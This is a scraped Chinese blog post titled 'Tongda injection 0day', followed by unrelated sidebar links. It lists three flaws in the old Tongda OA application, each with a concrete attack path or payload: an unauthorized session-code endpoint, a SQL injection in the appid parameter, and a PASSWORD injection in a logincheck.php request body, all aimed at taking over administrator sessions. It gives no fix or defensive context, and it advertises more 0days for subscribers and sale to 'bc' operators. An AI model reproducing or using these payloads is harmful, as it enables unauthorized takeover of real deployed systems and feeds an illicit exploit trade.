当前位置:网站首页>Tongda injection 0day
Tongda injection 0day
2022-07-07 07:35:00 【Immortal fish】
Catalog
The old version of Tongda Application :
Loophole 1:
The vulnerability lies in :
/ispirit/login_code_check.php?codeuid=An attacker can get the administrator session
python Script :
no
Loophole principle : The main reason is that the old version has unauthorized access .
Loophole 2:
Leak location :
pda/appcenter/submenu.php?appid=11+and+pow(999,1)The loophole is appid There is an injection , You can get the administrator sessions
Loophole 3:
Leak location :
logincheck.php
UNAME=admin&PASSWORD='&encode_type=1The loophole is password There is an injection , You can get the administrator sessions
more 0day Please subscribe to me ~ In addition, our px send bc Of 0day, You can contact me
边栏推荐
- Mutual conversion between InputStream, int, shot, long and byte arrays
- Causes and solutions of oom (memory overflow)
- 1140_ SiCp learning notes_ Use Newton's method to solve the square root
- 记一个并发规则验证实现
- 直播平台源码,可折叠式菜单栏
- 1089: highest order of factorial
- Flutter riverpod is comprehensively and deeply analyzed. Why is it officially recommended?
- Bindingexception exception (error reporting) processing
- Advanced level of C language (high level) pointer
- ../ And/
猜你喜欢
Abnova immunohistochemical service solution
关于二进制无法精确表示小数
Detailed explanation of neo4j installation process
Le Service MySQL manque dans le service informatique
Music | cat and mouse -- classic not only plot
A concurrent rule verification implementation
弹性布局(一)
Interviewer: what development models do you know?
Communication between non parent and child components
虚拟机的作用
随机推荐
My ideal software tester development status
JSON introduction and JS parsing JSON
Causes and solutions of oom (memory overflow)
Rxjs - observable doesn't complete when an error occurs - rxjs - observable doesn't complete when an error occurs
Robot technology innovation and practice old version outline
2022-07-06:以下go语言代码是否会panic?A:会;B:不会。 package main import “C“ func main() { var ch chan struct
Leetcode-543. Diameter of Binary Tree
在线直播系统源码,使用ValueAnimator实现view放大缩小动画效果
Leetcode-206. Reverse Linked List
Leetcode-226. Invert Binary Tree
Sqlmap tutorial (IV) practical skills three: bypass the firewall
Differences between H5 architecture and native architecture
外包幹了三年,廢了...
Bi she - college student part-time platform system based on SSM
基于Flask搭建个人网站
Outsourcing for four years, abandoned
Tumor immunotherapy research prosci Lag3 antibody solution
我理想的软件测试人员发展状态
二、并发、测试笔记 青训营笔记
URP - shaders and materials - simple lit